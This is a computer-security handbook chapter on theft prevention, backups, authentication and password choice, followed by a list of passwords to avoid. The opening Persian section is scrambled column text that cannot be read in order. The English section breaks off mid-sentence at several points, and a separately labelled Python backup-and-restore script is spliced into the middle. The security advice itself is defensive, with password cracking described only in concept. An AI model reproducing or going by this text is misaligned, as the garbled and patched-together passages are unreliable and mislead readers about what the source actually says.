ﻧﻴﺴﺖ .ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ
ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ ،ﻗـﻮﺍﻧﻴﻦ ،ﻭ ﻣﻼﺣﻈـﺎﺕ ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ downloadﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ. ﻻ
ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ
ﻣﺸﻜﻠﺘﺮ ﺍﺯ downloadﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ
ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ
ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛
ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ
ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ •
ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ
ﺑﻴﺎﻭﺭﻳﺪ .ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ
ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟ ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ
٩
ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ
ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ:
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ
ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ • ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
ﺗﻌﻤﻴﺮ ﺷﻮﺩ. ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ " "Updateﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ
ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ. • ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ
ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ •
ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ ،ﺁﻥ ﻋﻴـﺐ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ •
ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ. )ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ ،ﻣــﺪﺍﺭﺱ ،ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ
ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ١٠ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ
ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ •
ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ.
ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ.
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ
ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ، •
ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ
ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ.
ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ
ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ ،ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ
ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ .ﺩﺭ ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ.
ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ،ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ
ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ
ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ .ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ
ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ
ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ،ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ ،ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ
ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ .ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ ،ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ
ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ ،ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ
ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ ،ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ ۹
ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ ،ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ ﻣﻲﺷﻮﺩ.
10 System Administrator
Chapter Three
Computer and Data Security

Introduction
One of the best ways to understand information security is to use a rule-based approach. Starting with an introduction to physical security in this chapter, the remaining chapters of Part Two examine other aspects of security and explain the basis for establishing security processes for personal computers and small groups of computers. Information on the technical aspects of security for larger organizations and professional users is given in Part Five. Once the information in this chapter has familiarized you with the general subject, you can add to your technical knowledge using the material in Part Five (IT Security and Technical Administrators).

Physical security
The first step is to make sure that your computer is physically secure. Depending on where you keep your computer and on how sensitive the computer and its data are, this step may be a minor matter or a very important one.

Computer theft
Computer theft is a growing problem. Computers, and laptops in particular, are easily stolen and very hard to find again. If the thief does not want the computer for personal use, there are plenty of places that buy stolen and second-hand computers. Some thieves do not steal the computer and its monitor whole, but rather parts

Having a computer stolen is very distressing, and if you are not insured it will cost you dearly. Sometimes theft of information leads to the disclosure of business matters or of people's confidential secrets, and in worse cases computer theft leads to the loss of one's job. Nevertheless, if a few simple and inexpensive methods are used, theft of desktop and laptop computers can be prevented, or at least made considerably less likely.

There are two approaches to preventing computer theft: make the computer hard to steal, or make it less attractive to steal.

Make the computer hard to steal
There are several ways to make a computer hard to steal:
• Make sure the place where the computer is kept is secure. Keep the computer in a lockable room, or, if you work alongside colleagues at your workplace, place the computer where they can see it. Do not leave your computer unattended in public places such as airports.
• If you think that someone may enter the room at night while you are away from your workplace and steal the computer, use an alarm system.
• For security, attach your computer with a steel cable or chain to a bar, pipe or other object that cannot be moved. This method is used in fairly public places such as schools and libraries. Most computers have a dedicated attachment point. Laptops also usually have special cables and locks for this purpose.
• If the computer has a lock that prevents the case from being opened, use it. Special screws that are not easy to undo can also be used for this purpose.
• If there is valuable information (such as work data or personal information) on your computer, then whenever you leave it unattended or are away from it (for example when you leave your hotel and the computer is in the room) you need to reduce the possibility of logical access to it as far as you can. Logical access means actually using the computer while physical access to it is available. Strong passwords and password-protected screen savers are good options to start with for this kind of protection (for more information see the discussion of login authorization in this chapter).
• Laptops and PDAs (personal digital assistants) are small and therefore easy to steal. If you do not use them much, be sure to take them out of the workplace.

Make the computer less attractive to steal
Very few people are willing to buy a second-hand computer, especially if it is obvious that the computer is stolen. The best and cheapest way to make thieves unwilling to steal a computer is to engrave or paint your details on the body of the computer with fixed, permanent markings that cannot be removed. This information can include your name or other details. Take care not to put such markings on the ventilation slots or other openings. Also be aware that marking the case can sometimes void the warranty.

Computers are vulnerable
Computers are sensitive to dust and to uneven surfaces. If a computer is used somewhere dusty, it must be cleaned regularly and very carefully so that the ventilation slots do not become blocked. Some computers are also sensitive to dips and bumps in the surface they stand on.

Other aspects of physical security
If you have opened your computer's case to install a piece of hardware, heed the warnings given about electrostatic shock (electrostatic shock damages hardware and must be prevented). Also note that, to prevent electric shock, your body needs to be in constant contact with ground.

To protect your data, make backups
The previous section dealt with establishing physical security. This section describes measures that let you be sure your data and programs are fully protected. How do you protect the data and programs on your computer?
Data can be lost for several reasons, some of which are listed below:
• Accidental deletion of a file;
• Theft of the computer;
• Unintentionally saving one file over another;
• A program malfunctioning in a way that changes or deletes data;
• A malicious program (such as a virus) that changes, overwrites or deletes data;
• A hardware fault (for example in the hard disk, disk drive, processor or power supply) that causes data to be lost;

Electronic intrusion and sabotage
Attackers and destructive viruses regularly change or delete data. Having backups is a great help to users here as well.

Archived information
Backups count as archived information that makes it possible to compare current software and data with older software and data. This lets you determine what has been changed, deliberately or by mistake. Backups are also a valuable resource if you want to go back and reconstruct the history of a project.

Theft
Stealing computers and selling them is very easy. That being so, making backups and storing them somewhere away from the computer, in a secure place, is a great help, because there have been many cases in which the backups were stolen along with the computer.

you do not lose your data, and in most cases you can recover your system and bring it back to a stable, lasting state. Even if the computer's data has been lost entirely, with a complete set of backups you will be able to restore all the information onto a new computer and have access to it again. Of course this works only if the backups have been stored somewhere other than on the affected computer. Backups are the most effective way of staying safe from the dangers you face at the office or at home.

A few ways of making backups are given below:
• Copy your sensitive files to floppy disks, optical discs, or high-capacity rewritable magnetic disks.
• Copy the contents of the disk to a mirror disk or, if there is enough space, to a directory on the same main disk. This of course is of little help in a major failure and is useful only when some files have been deleted by accident.
• Every so often, create a compressed archive of your important files. The resulting backups can be kept on the original system itself or copied to other computers in different physical locations.
• Back up your files and transfer the backup to another computer over the network or the Internet.

There are other forms of backup as well. Backup programs usually offer the user suggestions on how to make backups.

Where should backups be kept?
The answer to this question depends on your reason for using backups. If backups are made to protect data against

that are responsible for the compatibility of the operating system and application programs (such as the various settings and configuration files) should be backed up. Determining where these files are kept, and making sure they are correct so that they can be restored without trouble in the future, is very hard, but you can keep all your data files in a few main directories and make your backups so that they cover only your own unique information.
• If you have a lot of personal data, back it up periodically, but at short intervals back up only the files that have changed. This kind of backup is called an incremental backup. Note that to restore files with this kind of backup you will need both the last full backup and the last incremental backup.

Are the backups usable?
There are several reasons why you might be unable to use your backups when you need them:
• The copy is very old or physically damaged. This problem is seen most often with floppy disks and magnetic media.
• The device that wrote the backup was faulty, so the data written to the backup cannot be read. In such cases it may be possible to read the backup with another, similar device.
• The medium holding the backup is defective. Such media defects used to be very common with floppy disks, to the point that nobody was much surprised if a disk became unreadable only a few days after it was written. Compact discs had a reputation as far more durable media, but a study in recent years showed that compact discs of poor quality can become unreadable about two years after data is written to them.

Reading backups on a device other than the one that made them is a good check for making sure the backup medium is sound. Note that if you write backups to erasable magnetic disks (such as Zip disks and floppies), you should use new, clean disks.

Some people keep backups for a very long time; but the question is, when are they going to use copies of documents, pictures and programs made several years ago? If you intend to keep backups for a long time, you must also consider the likelihood of the medium becoming obsolete. For example, if data was stored on a five-inch floppy of the kind common in 1980, can a computer with a five-inch disk drive be found today to recover it?

How many backups should be kept?
If you back up what you have once a week, then in the event of a catastrophe you will lose at most one week of information. This is justifiable from a security standpoint, but over time the space taken up by backups grows and grows. How many of these backups should be kept? If you use magnetic disks or compact discs there is no reason to throw them away quickly, because they take up little space and cannot be reused anyway; but you should always keep several backup copies. In all of the examples above, the last four copies could be kept.

Why is it better to do it this way? Why keep last month's copy when a newer one exists? The reason is simple: the last copy you made may be unreadable, lost or stolen. In that case it is clear that although the copies from previous months are not fully up to date, having them is better than not having them. This is another example of the point that a high level of security is built from multiple and somewhat redundant measures.

Back up purchased software
If the licence for software you have bought allows it, always make a second copy of the software's compact discs and use that copy for installation and support.

The most important point about backups
The most important point about backups is that they must be made at regular intervals. Some people do not take the trouble to make backups and may end up suffering the consequences. When such people do run into a problem, they generally imagine that it will not happen again. Our recommendation remains that you guard against the potential risk and make backups.

Authentication
Authentication lets the computer know who you are. This knowledge makes it possible to prevent fraud. You are usually identified by a user name and a password, although there are various kinds of such identification systems. The point to note is that the words used as passwords must be ones that cannot
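The backup guidance above (incremental backups, checking that a backup can be read back, and keeping the last four copies) can be put into a small routine. The following Python sketch is an added example and not part of the handbook; the function names, the manifest layout and the dated folder names are assumptions made for illustration. As in the text, "incremental" here means the files changed since the last full backup, so a restore needs the last full set plus the last incremental set.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


def sha256(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(folder):
    """Map each file under folder (relative path) to its SHA-256 digest."""
    folder = Path(folder)
    return {p.relative_to(folder).as_posix(): sha256(p)
            for p in sorted(folder.rglob("*")) if p.is_file()}


def _manifest(backup_dir):
    return json.loads((Path(backup_dir) / "manifest.json").read_text())


def _write(src, dest, kind, files, deleted=()):
    dest = Path(dest)
    (dest / "data").mkdir(parents=True, exist_ok=True)
    for rel in files:
        target = dest / "data" / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(Path(src) / rel, target)
    manifest = {"kind": kind, "files": files, "deleted": sorted(deleted)}
    (dest / "manifest.json").write_text(json.dumps(manifest, indent=1))
    return manifest


def full_backup(src, dest):
    return _write(src, dest, "full", snapshot(src))


def incremental_backup(src, dest, full_dir):
    """Store only the files that differ from the full backup in full_dir."""
    base = _manifest(full_dir)["files"]
    now = snapshot(src)
    changed = {rel: d for rel, d in now.items() if base.get(rel) != d}
    return _write(src, dest, "incremental", changed, set(base) - set(now))


def verify(backup_dir):
    """Read the backup back and list files that are missing or altered."""
    data = Path(backup_dir) / "data"
    return [rel for rel, d in _manifest(backup_dir)["files"].items()
            if not (data / rel).is_file() or sha256(data / rel) != d]


def restore(full_dir, incr_dir, target):
    """Rebuild target from the last full backup plus the last incremental."""
    target = Path(target)
    for layer in (full_dir, incr_dir):
        if verify(layer):
            raise ValueError(f"backup {layer} failed verification")
        manifest = _manifest(layer)
        for rel in manifest["files"]:
            out = target / rel
            out.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(Path(layer) / "data" / rel, out)
        for rel in manifest["deleted"]:
            (target / rel).unlink(missing_ok=True)
    return snapshot(target)


def prune(root, keep=4):
    """Delete all but the newest `keep` backup sets (names must sort by date)."""
    sets = sorted(p for p in Path(root).iterdir() if p.is_dir())
    for old in sets[:-keep]:
        shutil.rmtree(old)
    return [p.name for p in sets[-keep:]]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:      # constructed sample data
        tmp = Path(tmp)
        (tmp / "home").mkdir()
        (tmp / "home" / "thesis.txt").write_text("draft 1")
        full_backup(tmp / "home", tmp / "sets" / "week-01-full")
        (tmp / "home" / "thesis.txt").write_text("draft 2")
        incremental_backup(tmp / "home", tmp / "sets" / "week-01-incr",
                           tmp / "sets" / "week-01-full")
        print(restore(tmp / "sets" / "week-01-full",
                      tmp / "sets" / "week-01-incr", tmp / "restored"))
```

Running `verify` on a machine other than the one that wrote the backup is the check the text recommends; `restore` refuses to use a set that fails it, which is when an older retained copy becomes useful.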
User identification
Most systems identify people by asking them to establish their identity in some way. This can be done by collecting various pieces of information: a user name, a membership number, a member name, and so on; in these discussions the term user name is generally used. Some systems use an e-mail address in place of a user name. In fact, in these systems the e-mail address is regarded as a particular form of user name. Various rules can apply to user names:
• Some systems limit the length of the name, while others place no limit on it.
• In some systems any symbol that can be typed on the keyboard may be used in a user name, while others accept only letters and digits and just a few symbols.
• Some systems treat upper-case and lower-case letters as the same, while others treat them as two different letters.

If the system gives you no choice, your user name will be the one assigned by the system. But if you have to choose the user name yourself, what should you bear in mind? Some points are given below:
• Do you want your user name to reveal your real identity? Is the name meant to help your friends and colleagues recognize you? An address
• Do you want to choose a name that is easy to remember? If you use an online service only rarely, you may want to use a name that sticks easily in the mind. Some people use a single user name for different services, especially when those services have nothing to do with anything important or sensitive.
• Do you want the name you use to be hard for others to guess? The user name for your bank account should be chosen so that others cannot easily guess it (adequate security calls for multi-layered protection. If you use your public e-mail address to log in to the banking system, it will be easier for thieves to guess).

Passwords
In some systems the user name is assigned by the system, but the password is a word that is in every case chosen by the user, and it must be of a form that is hard for other people to guess.
When passwords are stored on the host system they are usually encrypted, so that anyone who gains access to the disk cannot see the passwords. In some cases the encryption is such that the passwords cannot be decrypted, which is called one-way encryption. In these systems, when you enter your password to log in, it is first encrypted and then compared with the copy stored on disk (for more detail see Appendix 1 of this part).

Third rule:
Use a password that you can remember easily but that is hard for others to guess.

Because some host systems lack adequate security, attackers are sometimes able to get at the passwords of all users and obtain the encrypted passwords. Even if one-way encryption has been used for every password, an attacker may still be able to discover yours, because the encryption algorithms used for these passwords are well known, and the attacker can therefore use them to encrypt every word in the dictionary as well as other common passwords. So if, for example, you have used the word birthday as your password, the attacker will notice on encrypting the word birthday that its encrypted form matches what is on the disk, and from then on will know your password.

Since the whole idea of using passwords is to let you into the system whenever you wish while making them hard for other people to guess, a number of characteristics of strong passwords can be listed. As with user names, different systems apply different rules to passwords (minimum and maximum length, permitted characters, and so on).
• Never use a single word in your native language as a password. Choosing a phrase, a sentence, or fragments of words is more suitable.
• If the system accepts both upper-case and lower-case letters in passwords, use both, but not in their correct and predictable places.
• Where possible, mix in digits, permitted symbols and spaces.
• If the system allows spaces, or your password takes the form of a phrase, you can drop some of the spaces in your password (so that the password consists of words run together).
• To remember your password easily you can use the same password on several systems. If you do this, however, and someone discovers your password on one of these systems, the security of the other systems on which you used the same password is also put at risk. So choose a password of this kind only for systems that need no special protection. For example, using newspaper content and similar material requires no payment or confidential information, yet to read the articles of some newspapers on their websites you must enter a user name and password. In reality they only want you to log in to their system; you can therefore use the same password for reading different newspapers.
• Some people replace letters with look-alike symbols or digits; for example they use the digit "1" for the letters "I" or "L", the number "3" or the symbol "#" for the letter "E", the digit "0" for the letter "O", the symbol "@" for the letter "A", and the digit "5" for the letter "S". This is a good trick, but remember that a professional attacker knows these tricks thoroughly. They make the attacker's job a little harder, but not impossible.
• Replace the letter "I" with "eye" or "aye" or any meaningful word in your own language. This is especially useful for words such as "icon", which becomes "eyecon" after the change.
• Use acronyms (the first letters of the words that make up a phrase). For example, "tgbwc" is an acronym for the well-known Coca-Cola slogan ("Things Go Better With Coke").
• Spelling words backwards obscures them a little, but does not make them hard to recognize.
• Never use any of the following as your password:
o Your own user name or nickname;
o Your spouse's name, or the names of your children or parents;
o The names of pets;
o Your own birthday or that of any friend or relative;
o A telephone number, licence number or similar document number;
o Your favourite colour;
o Your rank or job title;
o The name of the organization you work for;
o Anything else you are known by;
